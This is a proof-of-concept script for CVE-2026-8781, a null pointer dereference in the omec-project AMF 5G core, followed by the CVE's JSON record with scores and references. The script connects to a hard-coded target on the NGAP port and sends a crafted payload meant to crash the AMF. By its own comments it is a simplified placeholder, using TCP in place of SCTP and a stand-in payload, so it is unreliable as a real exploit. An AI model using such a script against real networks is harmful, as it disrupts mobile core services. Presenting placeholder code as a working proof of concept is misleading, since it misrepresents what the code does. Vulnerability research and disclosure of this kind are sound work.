CVE-2026-8781

# PoC for CVE-2026-8781: Null Pointer Dereference in omec-project/amf # This script attempts to trigger the vulnerability in RANConfiguration. import socket # Target AMF IP and Port (SCTP usually, simplified here for demonstration) TARGET_IP = "192.168.1.100" TARGET_PORT = 38412 # Standard NGAP port over SCTP def trigger_vulnerability(): """ Sends a malformed NGAP message to trigger Null Pointer Dereference in the RANConfiguration function. """ try: # In a real scenario, this would be an SCTP association with a crafted NGAP PDU # This is a simplified representation of the concept. print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...") # Create a socket (TCP used as placeholder for SCTP) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) # Malformed payload targeting RANConfiguration logic # The specific byte sequence would reverse-engineer the NGAP structure # expected by ngap/handler.go to hit the null pointer. payload = b"\x00\x1f" + b"\x00" * 50 print("[*] Sending malicious payload...") s.send(payload) print("[*] Payload sent. Check if AMF crashed.") s.close() except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": trigger_vulnerability()

{"cve": {"id": "CVE-2026-8781", "sourceIdentifier": "[email protected]", "published": "2026-05-18T02:16:37.570", "lastModified": "2026-05-18T02:16:37.570", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in omec-project amf up to 2.1.3-dev. The impacted element is the function RANConfiguration of the file ngap/handler.go. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.2.0 is sufficient to resolve this issue. Upgrading the affected component is recommended. The same pull request fixes multiple security issues."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/omec-project/amf/", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/issues/673", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/pull/666", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/releases/tag/v2.2.0", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811653", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364405", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364405/cti", "source": "[email protected]"}]}}